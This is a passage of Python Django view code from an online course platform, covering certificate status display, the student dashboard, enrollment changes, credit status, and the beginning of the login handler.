            'status': one of 'generating', 'ready', 'notpassing', 'processing', 'restricted'
            'show_download_url': bool
            'download_url': url, only present if show_download_url is True
            'show_disabled_download_button': bool -- true if state is 'generating'
            'show_survey_button': bool
            'survey_url': url, only if show_survey_button is True
            'grade': if status is not 'processing'
            'can_unenroll': if status allows for unenrollment
    """
    # Courses that cannot certify (yet) get no certificate section at all.
    if not course_overview.may_certify():
        return {}

    current_status = certificate_status_for_student(user, course_overview.id)
    return _cert_info(user, course_overview, current_status, course_mode)
def reverification_info(statuses):
    """
    Returns reverification-related information for *all* of user's enrollments whose
    reverification status is in statuses.

    Args:
        statuses (list): a list of reverification statuses we want information for
            example: ["must_reverify", "denied"]

    Returns:
        defaultdict(list): one key per requested status, e.g.
            result["must_reverify"] = []
            result["must_reverify"] = [some information]
    """
    info_by_status = defaultdict(list)

    for status in statuses:
        # Looking up the key materializes it (defaultdict), so every
        # requested status appears in the result even when empty.
        entries = info_by_status[status]
        if entries:
            # Keep each status bucket ordered by reverification end date.
            entries.sort(key=lambda entry: entry.date)

    return info_by_status
def get_course_enrollments(user, org_to_include, orgs_to_exclude):
    """
    Given a user, return a filtered set of his or her course enrollments.

    Arguments:
        user (User): the user in question.
        org_to_include (str): If not None, only courses of this org pass the
            first filter. NOTE: orgs_to_exclude is still applied afterwards,
            so an included org that also appears in the exclude list is
            filtered out (callers normally remove it from the exclude list
            first).
        orgs_to_exclude (list[str]): courses of these orgs are excluded.

    Returns:
        generator[CourseEnrollment]: a sequence of enrollments to be displayed
        on the user's dashboard.
    """
    for enrollment in CourseEnrollment.enrollments_for_user(user):
        overview = enrollment.course_overview

        # A missing overview means the course is broken or was deleted; log
        # it and move on rather than breaking the whole dashboard.
        if not overview:
            log.error(
                "User %s enrolled in broken or non-existent course %s",
                user.username,
                enrollment.course_id
            )
            continue

        org = overview.location.org
        filtered_out = (
            (org_to_include and org != org_to_include) or
            org in orgs_to_exclude
        )
        if not filtered_out:
            yield enrollment
def _cert_info(user, course_overview, cert_status, course_mode):  # pylint: disable=unused-argument
    """
    Implements the logic for cert_info -- split out for testing.

    Arguments:
        user (User): A user.
        course_overview (CourseOverview): A course.
        cert_status (dict): status dict from certificate_status_for_student,
            or None when there is no certificate record for this user/course.
        course_mode (str): The enrollment mode (honor, verified, audit, etc.)
    """
    # simplify the status for the template using this lookup table
    template_state = {
        CertificateStatuses.generating: 'generating',
        CertificateStatuses.downloadable: 'ready',
        CertificateStatuses.notpassing: 'notpassing',
        CertificateStatuses.restricted: 'restricted',
        CertificateStatuses.auditing: 'auditing',
        CertificateStatuses.audit_passing: 'auditing',
        CertificateStatuses.audit_notpassing: 'auditing',
        CertificateStatuses.unverified: 'unverified',
    }

    default_status = 'processing'

    default_info = {
        'status': default_status,
        'show_disabled_download_button': False,
        'show_download_url': False,
        'show_survey_button': False,
        'can_unenroll': True,
    }

    if cert_status is None:
        return default_info

    is_hidden_status = cert_status['status'] in ('unavailable', 'processing', 'generating', 'notpassing', 'auditing')

    # 'early_no_info' courses surface nothing for in-progress/hidden statuses:
    # return an empty dict so the dashboard omits the certificate section.
    if course_overview.certificates_display_behavior == 'early_no_info' and is_hidden_status:
        return {}

    status = template_state.get(cert_status['status'], default_status)

    status_dict = {
        'status': status,
        'show_download_url': status == 'ready',
        'show_disabled_download_button': status == 'generating',
        'mode': cert_status.get('mode', None),
        'linked_in_url': None,
        'can_unenroll': status not in DISABLE_UNENROLL_CERT_STATES,
    }

    if (status in ('generating', 'ready', 'notpassing', 'restricted', 'auditing', 'unverified') and
            course_overview.end_of_course_survey_url is not None):
        status_dict.update({
            'show_survey_button': True,
            'survey_url': process_survey_link(course_overview.end_of_course_survey_url, user)})
    else:
        status_dict['show_survey_button'] = False

    if status == 'ready':
        # showing the certificate web view button if certificate is ready state and feature flags are enabled.
        if has_html_certificates_enabled(course_overview.id, course_overview):
            if course_overview.has_any_active_web_certificate:
                status_dict.update({
                    'show_cert_web_view': True,
                    'cert_web_view_url': get_certificate_url(course_id=course_overview.id, uuid=cert_status['uuid'])
                })
            else:
                # don't show download certificate button if we don't have an active certificate for course
                status_dict['show_download_url'] = False
        elif 'download_url' not in cert_status:
            # Data inconsistency: downloadable status but no URL to offer.
            # Fall back to the default ("processing") presentation.
            log.warning(
                u"User %s has a downloadable cert for %s, but no download url",
                user.username,
                course_overview.id
            )
            return default_info
        else:
            status_dict['download_url'] = cert_status['download_url']

        # If enabled, show the LinkedIn "add to profile" button
        # Clicking this button sends the user to LinkedIn where they
        # can add the certificate information to their profile.
        linkedin_config = LinkedInAddToProfileConfiguration.current()

        # posting certificates to LinkedIn is not currently
        # supported in White Labels
        if linkedin_config.enabled and not theming_helpers.is_request_in_themed_site():
            status_dict['linked_in_url'] = linkedin_config.add_to_profile_url(
                course_overview.id,
                course_overview.display_name,
                cert_status.get('mode'),
                cert_status['download_url']
            )

    if status in ('generating', 'ready', 'notpassing', 'restricted', 'auditing', 'unverified'):
        if 'grade' not in cert_status:
            # Note: as of 11/20/2012, we know there are students in this state-- cs169.1x,
            # who need to be regraded (we weren't tracking 'notpassing' at first).
            # We can add a log.warning here once we think it shouldn't happen.
            return default_info
        else:
            status_dict['grade'] = cert_status['grade']

    return status_dict
@ensure_csrf_cookie
def signin_user(request):
    """Deprecated. To be replaced by :class:`student_account.views.login_and_registration_form`."""
    external_auth_response = external_auth_login(request)
    if external_auth_response is not None:
        return external_auth_response
    # Determine the URL to redirect to following login:
    redirect_to = get_next_url_for_login_page(request)
    if request.user.is_authenticated():
        return redirect(redirect_to)

    third_party_auth_error = None
    for msg in messages.get_messages(request):
        # BUGFIX: guard against messages with empty extra_tags (the Django
        # default is '') -- ''.split() is [], so indexing [0] unconditionally
        # raised IndexError here.
        if msg.extra_tags and msg.extra_tags.split()[0] == "social-auth":
            # msg may or may not be translated. Try translating [again] in case we are able to:
            third_party_auth_error = _(unicode(msg))  # pylint: disable=translation-of-non-string
            break

    context = {
        'login_redirect_url': redirect_to,  # This gets added to the query string of the "Sign In" button in the header
        # Bool injected into JS to submit form if we're inside a running third-
        # party auth pipeline; distinct from the actual instance of the running
        # pipeline, if any.
        'pipeline_running': 'true' if pipeline.running(request) else 'false',
        'pipeline_url': auth_pipeline_urls(pipeline.AUTH_ENTRY_LOGIN, redirect_url=redirect_to),
        'platform_name': configuration_helpers.get_value(
            'platform_name',
            settings.PLATFORM_NAME
        ),
        'third_party_auth_error': third_party_auth_error
    }

    return render_to_response('login.html', context)
@ensure_csrf_cookie
def register_user(request, extra_context=None):
    """Deprecated. To be replaced by :class:`student_account.views.login_and_registration_form`."""
    # Determine the URL to redirect to following login:
    redirect_to = get_next_url_for_login_page(request)
    # Already-authenticated users have nothing to register; send them on.
    if request.user.is_authenticated():
        return redirect(redirect_to)

    # External auth (e.g. Shibboleth) may short-circuit registration entirely.
    external_auth_response = external_auth_register(request)
    if external_auth_response is not None:
        return external_auth_response

    context = {
        'login_redirect_url': redirect_to,  # This gets added to the query string of the "Sign In" button in the header
        'email': '',
        'name': '',
        'running_pipeline': None,
        'pipeline_urls': auth_pipeline_urls(pipeline.AUTH_ENTRY_REGISTER, redirect_url=redirect_to),
        'platform_name': configuration_helpers.get_value(
            'platform_name',
            settings.PLATFORM_NAME
        ),
        'selected_provider': '',
        'username': '',
    }

    if extra_context is not None:
        context.update(extra_context)

    # Shibboleth-driven registrations use a dedicated template.
    if context.get("extauth_domain", '').startswith(external_auth.views.SHIBBOLETH_DOMAIN_PREFIX):
        return render_to_response('register-shib.html', context)

    # If third-party auth is enabled, prepopulate the form with data from the
    # selected provider.
    if third_party_auth.is_enabled() and pipeline.running(request):
        running_pipeline = pipeline.get(request)
        current_provider = provider.Registry.get_from_pipeline(running_pipeline)
        if current_provider is not None:
            overrides = current_provider.get_register_form_data(running_pipeline.get('kwargs'))
            overrides['running_pipeline'] = running_pipeline
            overrides['selected_provider'] = current_provider.name
            context.update(overrides)

    return render_to_response('register.html', context)
def complete_course_mode_info(course_id, enrollment, modes=None):
    """
    Augment course-mode data with upsell information for the dashboard.

    Returns a dict with:
        - 'show_upsell': whether to advertise upgrading to the verified track
        - 'days_for_upsell': days remaining before the verified mode expires
          (None when the mode has no expiration date)
    plus 'verified_sku' / 'verified_bulk_sku' when the upsell is shown.
    """
    if modes is None:
        modes = CourseMode.modes_for_course_dict(course_id)

    mode_info = {'show_upsell': False, 'days_for_upsell': None}

    # Upsell only when a verified track exists and the learner's current
    # mode is one we upsell from (e.g. audit/honor).
    verified_exists = CourseMode.VERIFIED in modes
    eligible_mode = enrollment.mode in CourseMode.UPSELL_TO_VERIFIED_MODES
    if verified_exists and eligible_mode:
        verified_mode = modes['verified']
        mode_info['show_upsell'] = True
        mode_info['verified_sku'] = verified_mode.sku
        mode_info['verified_bulk_sku'] = verified_mode.bulk_sku

        # If there is an expiration date, report how far away it is.
        expiration = verified_mode.expiration_datetime
        if expiration:
            today = datetime.datetime.now(UTC).date()
            mode_info['days_for_upsell'] = (expiration.date() - today).days

    return mode_info
def is_course_blocked(request, redeemed_registration_codes, course_key):
    """
    Checking either registration is blocked or not .

    Returns True when any of the user's redeemed registration codes for this
    course belongs to an invoice that is no longer valid (e.g. an unpaid
    bulk purchase). As a side effect, the first such invalid code also opts
    the user out of course emails and emits a tracking event.
    """
    blocked = False
    for redeemed_registration in redeemed_registration_codes:
        # registration codes may be generated via Bulk Purchase Scenario
        # we have to check only for the invoice generated registration codes
        # that their invoice is valid or not
        if redeemed_registration.invoice_item:
            if not redeemed_registration.invoice_item.invoice.is_valid:
                blocked = True
                # disabling email notifications for unpaid registration courses
                Optout.objects.get_or_create(user=request.user, course_id=course_key)
                log.info(
                    u"User %s (%s) opted out of receiving emails from course %s",
                    request.user.username,
                    request.user.email,
                    course_key,
                )
                # NOTE(review): event name "change-email1-settings" looks like a
                # typo for "change-email-settings", but it may be what the
                # analytics pipeline keys on -- confirm before renaming.
                track.views.server_track(
                    request,
                    "change-email1-settings",
                    {"receive_emails": "no", "course": course_key.to_deprecated_string()},
                    page='dashboard',
                )
                break

    return blocked
@login_required
@ensure_csrf_cookie
def dashboard(request):
    """
    Render the student dashboard.

    Gathers the user's course enrollments together with all of the per-course
    state the dashboard template needs -- certificate status, identity
    verification, credit status, email settings, refund/unenroll/paywall
    eligibility, prerequisite completion, program associations -- plus any
    notification banners, then renders ``dashboard.html``.
    """
    user = request.user

    platform_name = configuration_helpers.get_value("platform_name", settings.PLATFORM_NAME)

    # we want to filter and only show enrollments for courses within
    # the 'ORG' defined in configuration.
    course_org_filter = configuration_helpers.get_value('course_org_filter')

    # Let's filter out any courses in an "org" that has been declared to be
    # in a configuration
    org_filter_out_set = configuration_helpers.get_all_orgs()

    # remove our current org from the "filter out" list, if applicable
    if course_org_filter:
        org_filter_out_set.remove(course_org_filter)

    # Build our (course, enrollment) list for the user, but ignore any courses that no
    # longer exist (because the course IDs have changed). Still, we don't delete those
    # enrollments, because it could have been a data push snafu.
    course_enrollments = list(get_course_enrollments(user, course_org_filter, org_filter_out_set))

    # sort the enrollment pairs by the enrollment date
    course_enrollments.sort(key=lambda x: x.created, reverse=True)

    # Retrieve the course modes for each course
    enrolled_course_ids = [enrollment.course_id for enrollment in course_enrollments]
    __, unexpired_course_modes = CourseMode.all_and_unexpired_modes_for_courses(enrolled_course_ids)
    course_modes_by_course = {
        course_id: {
            mode.slug: mode
            for mode in modes
        }
        for course_id, modes in unexpired_course_modes.iteritems()
    }

    # Check to see if the student has recently enrolled in a course.
    # If so, display a notification message confirming the enrollment.
    enrollment_message = _create_recent_enrollment_message(
        course_enrollments, course_modes_by_course
    )

    course_optouts = Optout.objects.filter(user=user).values_list('course_id', flat=True)

    # Inactive (unactivated) accounts see an "activate your account" banner.
    message = ""
    if not user.is_active:
        message = render_to_string(
            'registration/activate_account_notice.html',
            {'email': user.email, 'platform_name': platform_name}
        )

    # Global staff can see what courses errored on their dashboard
    staff_access = False
    errored_courses = {}
    if has_access(user, 'staff', 'global'):
        # Show any courses that errored on load
        staff_access = True
        errored_courses = modulestore().get_errored_courses()

    show_courseware_links_for = frozenset(
        enrollment.course_id for enrollment in course_enrollments
        if has_access(request.user, 'load', enrollment.course_overview)
        and has_access(request.user, 'view_courseware_with_prerequisites', enrollment.course_overview)
    )

    # Find programs associated with courses being displayed. This information
    # is passed in the template context to allow rendering of program-related
    # information on the dashboard.
    meter = programs_utils.ProgramProgressMeter(user, enrollments=course_enrollments)
    programs_by_run = meter.engaged_programs(by_run=True)

    # Construct a dictionary of course mode information
    # used to render the course list. We re-use the course modes dict
    # we loaded earlier to avoid hitting the database.
    course_mode_info = {
        enrollment.course_id: complete_course_mode_info(
            enrollment.course_id, enrollment,
            modes=course_modes_by_course[enrollment.course_id]
        )
        for enrollment in course_enrollments
    }

    # Determine the per-course verification status
    # This is a dictionary in which the keys are course locators
    # and the values are one of:
    #
    # VERIFY_STATUS_NEED_TO_VERIFY
    # VERIFY_STATUS_SUBMITTED
    # VERIFY_STATUS_APPROVED
    # VERIFY_STATUS_MISSED_DEADLINE
    #
    # Each of which correspond to a particular message to display
    # next to the course on the dashboard.
    #
    # If a course is not included in this dictionary,
    # there is no verification messaging to display.
    verify_status_by_course = check_verify_status_by_course(user, course_enrollments)
    cert_statuses = {
        enrollment.course_id: cert_info(request.user, enrollment.course_overview, enrollment.mode)
        for enrollment in course_enrollments
    }

    # only show email settings for Mongo course and when bulk email is turned on
    show_email_settings_for = frozenset(
        enrollment.course_id for enrollment in course_enrollments if (
            BulkEmailFlag.feature_enabled(enrollment.course_id)
        )
    )

    # Verification Attempts
    # Used to generate the "you must reverify for course x" banner
    verification_status, verification_msg = SoftwareSecurePhotoVerification.user_status(user)

    # Gets data for midcourse reverifications, if any are necessary or have failed
    statuses = ["approved", "denied", "pending", "must_reverify"]
    reverifications = reverification_info(statuses)

    show_refund_option_for = frozenset(
        enrollment.course_id for enrollment in course_enrollments
        if enrollment.refundable()
    )

    # Courses whose registration codes come from an invalid invoice are
    # blocked from courseware access (see is_course_blocked).
    block_courses = frozenset(
        enrollment.course_id for enrollment in course_enrollments
        if is_course_blocked(
            request,
            CourseRegistrationCode.objects.filter(
                course_id=enrollment.course_id,
                registrationcoderedemption__redeemed_by=request.user
            ),
            enrollment.course_id
        )
    )

    enrolled_courses_either_paid = frozenset(
        enrollment.course_id for enrollment in course_enrollments
        if enrollment.is_paid_course()
    )

    # If there are *any* denied reverifications that have not been toggled off,
    # we'll display the banner
    denied_banner = any(item.display for item in reverifications["denied"])

    # Populate the Order History for the side-bar.
    order_history_list = order_history(user, course_org_filter=course_org_filter, org_filter_out_set=org_filter_out_set)

    # get list of courses having pre-requisites yet to be completed
    courses_having_prerequisites = frozenset(
        enrollment.course_id for enrollment in course_enrollments
        if enrollment.course_overview.pre_requisite_courses
    )
    courses_requirements_not_met = get_pre_requisite_courses_not_completed(user, courses_having_prerequisites)

    # Explain redirects back to the dashboard (course not open / closed).
    if 'notlive' in request.GET:
        redirect_message = _("The course you are looking for does not start until {date}.").format(
            date=request.GET['notlive']
        )
    elif 'course_closed' in request.GET:
        redirect_message = _("The course you are looking for is closed for enrollment as of {date}.").format(
            date=request.GET['course_closed']
        )
    else:
        redirect_message = ''

    context = {
        'enrollment_message': enrollment_message,
        'redirect_message': redirect_message,
        'course_enrollments': course_enrollments,
        'course_optouts': course_optouts,
        'message': message,
        'staff_access': staff_access,
        'errored_courses': errored_courses,
        'show_courseware_links_for': show_courseware_links_for,
        'all_course_modes': course_mode_info,
        'cert_statuses': cert_statuses,
        'credit_statuses': _credit_statuses(user, course_enrollments),
        'show_email_settings_for': show_email_settings_for,
        'reverifications': reverifications,
        'verification_status': verification_status,
        'verification_status_by_course': verify_status_by_course,
        'verification_msg': verification_msg,
        'show_refund_option_for': show_refund_option_for,
        'block_courses': block_courses,
        'denied_banner': denied_banner,
        'billing_email': settings.PAYMENT_SUPPORT_EMAIL,
        'user': user,
        'logout_url': reverse('logout'),
        'platform_name': platform_name,
        'enrolled_courses_either_paid': enrolled_courses_either_paid,
        'provider_states': [],
        'order_history_list': order_history_list,
        'courses_requirements_not_met': courses_requirements_not_met,
        'nav_hidden': True,
        'programs_by_run': programs_by_run,
        'show_program_listing': ProgramsApiConfig.current().show_program_listing,
        'disable_courseware_js': True,
    }

    # When the external ecommerce service handles payment, point upsell
    # links at its payment page instead of the in-LMS flow.
    ecommerce_service = EcommerceService()
    if ecommerce_service.is_enabled(request.user):
        context.update({
            'use_ecommerce_payment_flow': True,
            'ecommerce_payment_page': ecommerce_service.payment_page_url(),
        })

    return render_to_response('dashboard.html', context)
def _create_recent_enrollment_message(course_enrollments, course_modes):  # pylint: disable=invalid-name
    """
    Builds a recent course enrollment message.

    Constructs a new message template based on any recent course enrollments
    for the student.

    Args:
        course_enrollments (list[CourseEnrollment]): a list of course enrollments.
        course_modes (dict): Mapping of course ID's to course mode dictionaries.

    Returns:
        A string representing the HTML message output from the message template,
        or None if there are no recently enrolled courses.
    """
    recent = _get_recently_enrolled_courses(course_enrollments)
    if not recent:
        return None

    enroll_messages = []
    for enrollment in recent:
        overview = enrollment.course_overview
        enroll_messages.append({
            "course_id": overview.id,
            "course_name": overview.display_name,
            "allow_donation": _allow_donation(course_modes, overview.id, enrollment),
        })

    platform_name = configuration_helpers.get_value('platform_name', settings.PLATFORM_NAME)
    return render_to_string(
        'enrollment/course_enrollment_message.html',
        {'course_enrollment_messages': enroll_messages, 'platform_name': platform_name}
    )
def _get_recently_enrolled_courses(course_enrollments):
    """
    Given a list of enrollments, filter out all but recent enrollments.

    "Recent" means active and created within the configurable window
    (``DashboardConfiguration.recent_enrollment_time_delta`` seconds).
    Enrollments with no created date are explicitly excluded.

    Args:
        course_enrollments (list[CourseEnrollment]): A list of course enrollments.

    Returns:
        list[CourseEnrollment]: A list of recent course enrollments.
    """
    window_seconds = DashboardConfiguration.current().recent_enrollment_time_delta
    cutoff = datetime.datetime.now(UTC) - datetime.timedelta(seconds=window_seconds)

    recent = []
    for enrollment in course_enrollments:
        # A missing created date never compares greater than the cutoff,
        # so such enrollments are dropped from the "recent" list.
        if enrollment.is_active and enrollment.created > cutoff:
            recent.append(enrollment)
    return recent
def _allow_donation(course_modes, course_id, enrollment):
    """Determines if the dashboard will request donations for the given course.

    Check if donations are configured for the platform, and if the current course is accepting donations.

    Args:
        course_modes (dict): Mapping of course ID's to course mode dictionaries.
        course_id (str): The unique identifier for the course.
        enrollment(CourseEnrollment): The enrollment object in which the user is enrolled

    Returns:
        True if the course is allowing donations.
    """
    if course_id not in course_modes:
        flat_unexpired_modes = {
            unicode(course_id): [mode for mode in modes]
            for course_id, modes in course_modes.iteritems()
        }
        flat_all_modes = {
            unicode(course_id): [mode.slug for mode in modes]
            for course_id, modes in CourseMode.all_modes_for_courses([course_id]).iteritems()
        }
        log.error(
            u'Can not find `%s` in course modes.`%s`. All modes: `%s`',
            course_id,
            flat_unexpired_modes,
            flat_all_modes
        )
        # BUGFIX: previously execution fell through to the lookups below and
        # raised KeyError whenever donations were enabled. An unknown course
        # simply never requests donations.
        return False

    donations_enabled = DonationConfiguration.current().enabled
    return (
        donations_enabled and
        enrollment.mode in course_modes[course_id] and
        course_modes[course_id][enrollment.mode].min_price == 0
    )
def _update_email_opt_in(request, org):
    """Helper function used to hit the profile API if email opt-in is enabled."""
    raw_value = request.POST.get('email_opt_in')
    # Only touch the preference when the form actually posted a value.
    if raw_value is None:
        return
    preferences_api.update_email_opt_in(request.user, org, raw_value == 'true')
def _credit_statuses(user, course_enrollments):
    """
    Retrieve the status for credit courses.

    A credit course is a course for which a user can purchased
    college credit. The current flow is:

    1. User becomes eligible for credit (submits verifications, passes the course, etc.)
    2. User purchases credit from a particular credit provider.
    3. User requests credit from the provider, usually creating an account on the provider's site.
    4. The credit provider notifies us whether the user's request for credit has been accepted or rejected.

    The dashboard is responsible for communicating the user's state in this flow.

    Arguments:
        user (User): The currently logged-in user.
        course_enrollments (list[CourseEnrollment]): List of enrollments for the
            user.

    Returns: dict

    The returned dictionary has keys that are `CourseKey`s and values that
    are dictionaries with:

        * eligible (bool): True if the user is eligible for credit in this course.
        * deadline (datetime): The deadline for purchasing and requesting credit for this course.
        * purchased (bool): Whether the user has purchased credit for this course.
        * provider_name (string): The display name of the credit provider.
        * provider_status_url (string): A URL the user can visit to check on their credit request status.
        * request_status (string): Either "pending", "approved", or "rejected"
        * error (bool): If true, an unexpected error occurred when retrieving the credit status,
            so the user should contact the support team.

    Example:
        >>> _credit_statuses(user, course_enrollments)
        {
            CourseKey.from_string("edX/DemoX/Demo_Course"): {
                "course_key": "edX/DemoX/Demo_Course",
                "eligible": True,
                "deadline": 2015-11-23 00:00:00 UTC,
                "purchased": True,
                "provider_name": "Hogwarts",
                "provider_status_url": "http://example.com/status",
                "request_status": "pending",
                "error": False
            }
        }

    """
    # Imported here rather than at module level; presumably to avoid a
    # circular import -- TODO confirm before hoisting.
    from openedx.core.djangoapps.credit import api as credit_api

    # Feature flag off
    if not settings.FEATURES.get("ENABLE_CREDIT_ELIGIBILITY"):
        return {}

    request_status_by_course = {
        request["course_key"]: request["status"]
        for request in credit_api.get_credit_requests_for_user(user.username)
    }

    credit_enrollments = {
        enrollment.course_id: enrollment
        for enrollment in course_enrollments
        if enrollment.mode == "credit"
    }

    # When a user purchases credit in a course, the user's enrollment
    # mode is set to "credit" and an enrollment attribute is set
    # with the ID of the credit provider. We retrieve *all* such attributes
    # here to minimize the number of database queries.
    purchased_credit_providers = {
        attribute.enrollment.course_id: attribute.value
        for attribute in CourseEnrollmentAttribute.objects.filter(
            namespace="credit",
            name="provider_id",
            enrollment__in=credit_enrollments.values()
        ).select_related("enrollment")
    }

    provider_info_by_id = {
        provider["id"]: provider
        for provider in credit_api.get_credit_providers()
    }

    statuses = {}
    for eligibility in credit_api.get_eligibilities_for_user(user.username):
        course_key = CourseKey.from_string(unicode(eligibility["course_key"]))
        providers_names = get_credit_provider_display_names(course_key)
        status = {
            "course_key": unicode(course_key),
            "eligible": True,
            "deadline": eligibility["deadline"],
            "purchased": course_key in credit_enrollments,
            "provider_name": make_providers_strings(providers_names),
            "provider_status_url": None,
            "provider_id": None,
            "request_status": request_status_by_course.get(course_key),
            "error": False,
        }

        # If the user has purchased credit, then include information about the credit
        # provider from which the user purchased credit.
        # We retrieve the provider's ID from the an "enrollment attribute" set on the user's
        # enrollment when the user's order for credit is fulfilled by the E-Commerce service.
        if status["purchased"]:
            provider_id = purchased_credit_providers.get(course_key)
            if provider_id is None:
                status["error"] = True
                log.error(
                    u"Could not find credit provider associated with credit enrollment "
                    u"for user %s in course %s. The user will not be able to see his or her "
                    u"credit request status on the student dashboard. This attribute should "
                    u"have been set when the user purchased credit in the course.",
                    user.id, course_key
                )
            else:
                provider_info = provider_info_by_id.get(provider_id, {})
                status["provider_name"] = provider_info.get("display_name")
                status["provider_status_url"] = provider_info.get("status_url")
                status["provider_id"] = provider_id

        statuses[course_key] = status

    return statuses
@transaction.non_atomic_requests
@require_POST
@outer_atomic(read_committed=True)
def change_enrollment(request, check_access=True):
    """
    Modify the enrollment status for the logged-in user.

    The request parameter must be a POST request (other methods return 405)
    that specifies course_id and enrollment_action parameters. If course_id or
    enrollment_action is not specified, if course_id is not valid, if
    enrollment_action is something other than "enroll" or "unenroll", if
    enrollment_action is "enroll" and enrollment is closed for the course, or
    if enrollment_action is "unenroll" and the user is not enrolled in the
    course, a 400 error will be returned. If the user is not logged in, 403
    will be returned; it is important that only this case return 403 so the
    front end can redirect the user to a registration or login page when this
    happens. This function should only be called from an AJAX request, so
    the error messages in the responses should never actually be user-visible.

    Args:
        request (`Request`): The Django request object

    Keyword Args:
        check_access (boolean): If True, we check that an accessible course actually
            exists for the given course_key before we enroll the student.
            The default is set to False to avoid breaking legacy code or
            code with non-standard flows (ex. beta tester invitations), but
            for any standard enrollment flow you probably want this to be True.

    Returns:
        Response
    """
    # Get the user
    user = request.user

    # Ensure the user is authenticated
    if not user.is_authenticated():
        return HttpResponseForbidden()

    # Ensure we received a course_id
    action = request.POST.get("enrollment_action")
    if 'course_id' not in request.POST:
        return HttpResponseBadRequest(_("Course id not specified"))

    try:
        course_id = SlashSeparatedCourseKey.from_deprecated_string(request.POST.get("course_id"))
    except InvalidKeyError:
        log.warning(
            u"User %s tried to %s with invalid course id: %s",
            user.username,
            action,
            request.POST.get("course_id"),
        )
        return HttpResponseBadRequest(_("Invalid course id"))

    if action == "enroll":
        # Make sure the course exists
        # We don't do this check on unenroll, or a bad course id can't be unenrolled from
        if not modulestore().has_course(course_id):
            log.warning(
                u"User %s tried to enroll in non-existent course %s",
                user.username,
                course_id
            )
            return HttpResponseBadRequest(_("Course id is invalid"))

        # Record the user's email opt-in preference
        if settings.FEATURES.get('ENABLE_MKTG_EMAIL_OPT_IN'):
            _update_email_opt_in(request, course_id.org)

        available_modes = CourseMode.modes_for_course_dict(course_id)

        # Check whether the user is blocked from enrolling in this course
        # This can occur if the user's IP is on a global blacklist
        # or if the user is enrolling in a country in which the course
        # is not available.
        redirect_url = embargo_api.redirect_if_blocked(
            course_id, user=user, ip_address=get_ip(request),
            url=request.path
        )
        if redirect_url:
            # The AJAX caller treats a URL in the response body as a redirect.
            return HttpResponse(redirect_url)

        # Check that auto enrollment is allowed for this course
        # (= the course is NOT behind a paywall)
        if CourseMode.can_auto_enroll(course_id):
            # Enroll the user using the default mode (audit)
            # We're assuming that users of the course enrollment table
            # will NOT try to look up the course enrollment model
            # by its slug. If they do, it's possible (based on the state of the database)
            # for no such model to exist, even though we've set the enrollment type
            # to "audit".
            try:
                enroll_mode = CourseMode.auto_enroll_mode(course_id, available_modes)
                if enroll_mode:
                    enrollment = CourseEnrollment.enroll(user, course_id, check_access=check_access, mode=enroll_mode)
                    enrollment.send_signal(EnrollStatusChange.enroll)
            except Exception:  # pylint: disable=broad-except
                return HttpResponseBadRequest(_("Could not enroll"))

        # If we have more than one course mode or professional ed is enabled,
        # then send the user to the choose your track page.
        # (In the case of no-id-professional/professional ed, this will redirect to a page that
        # funnels users directly into the verification / payment flow)
        if CourseMode.has_verified_mode(available_modes) or CourseMode.has_professional_mode(available_modes):
            return HttpResponse(
                reverse("course_modes_choose", kwargs={'course_id': unicode(course_id)})
            )

        # Otherwise, there is only one mode available (the default)
        return HttpResponse()
    elif action == "unenroll":
        enrollment = CourseEnrollment.get_enrollment(user, course_id)
        if not enrollment:
            return HttpResponseBadRequest(_("You are not enrolled in this course"))

        # Certain certificate states (e.g. already issued) block unenrollment.
        certificate_info = cert_info(user, enrollment.course_overview, enrollment.mode)
        if certificate_info.get('status') in DISABLE_UNENROLL_CERT_STATES:
            return HttpResponseBadRequest(_("Your certificate prevents you from unenrolling from this course"))

        CourseEnrollment.unenroll(user, course_id)
        return HttpResponse()
    else:
        return HttpResponseBadRequest(_("Enrollment action is invalid"))
# Need different levels of logging
@ensure_csrf_cookie
def login_user(request, error=""):  # pylint: disable=too-many-statements,unused-argument
    """AJAX request to log in the user.

    Supports two entry paths:

    * Third-party auth: a social-auth pipeline is running and the POST body
      carries no email/password, so the pipeline's already-authenticated
      identity is used.
    * First-party auth: ``email`` and ``password`` from the POST body.

    Returns a ``JsonResponse`` with a ``success`` flag (plus ``redirect_url``
    on success), or a plain-text 403 response when a third-party login has no
    linked platform account.
    """
    backend_name = None
    email = None
    password = None
    redirect_url = None
    response = None
    running_pipeline = None
    third_party_auth_requested = third_party_auth.is_enabled() and pipeline.running(request)
    third_party_auth_successful = False
    # Posting an email or password explicitly opts the user into first-party
    # auth even while a third-party pipeline is in progress.
    trumped_by_first_party_auth = bool(request.POST.get('email')) or bool(request.POST.get('password'))
    user = None
    platform_name = configuration_helpers.get_value("platform_name", settings.PLATFORM_NAME)
    if third_party_auth_requested and not trumped_by_first_party_auth:
        # The user has already authenticated via third-party auth and has not
        # asked to do first party auth by supplying a username or password. We
        # now want to put them through the same logging and cookie calculation
        # logic as with first-party auth.
        running_pipeline = pipeline.get(request)
        username = running_pipeline['kwargs'].get('username')
        backend_name = running_pipeline['backend']
        third_party_uid = running_pipeline['kwargs']['uid']
        requested_provider = provider.Registry.get_from_pipeline(running_pipeline)
        try:
            user = pipeline.get_authenticated_user(requested_provider, username, third_party_uid)
            third_party_auth_successful = True
        except User.DoesNotExist:
            # Third-party identity is valid but has no linked platform user;
            # tell the user how to link accounts via the dashboard.
            AUDIT_LOG.warning(
                u"Login failed - user with username {username} has no social auth "
                "with backend_name {backend_name}".format(
                    username=username, backend_name=backend_name)
            )
            message = _(
                "You've successfully logged into your {provider_name} account, "
                "but this account isn't linked with an {platform_name} account yet."
            ).format(
                platform_name=platform_name,
                provider_name=requested_provider.name,
            )
            message += "<br/><br/>"
            message += _(
                "Use your {platform_name} username and password to log into {platform_name} below, "
                "and then link your {platform_name} account with {provider_name} from your dashboard."
            ).format(
                platform_name=platform_name,
                provider_name=requested_provider.name,
            )
            message += "<br/><br/>"
            message += _(
                "If you don't have an {platform_name} account yet, "
                "click <strong>Register</strong> at the top of the page."
            ).format(
                platform_name=platform_name
            )
            return HttpResponse(message, content_type="text/plain", status=403)
    else:
        if 'email' not in request.POST or 'password' not in request.POST:
            return JsonResponse({
                "success": False,
                # TODO: User error message
                "value": _('There was an error receiving your login information. Please email us.'),
            })  # TODO: this should be status code 400
        email = request.POST['email']
        password = request.POST['password']
        try:
            user = User.objects.get(email=email)
        except User.DoesNotExist:
            # `user` stays None; authentication below is guaranteed to fail.
            if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
                AUDIT_LOG.warning(u"Login failed - Unknown user email")
            else:
                AUDIT_LOG.warning(u"Login failed - Unknown user email: {0}".format(email))
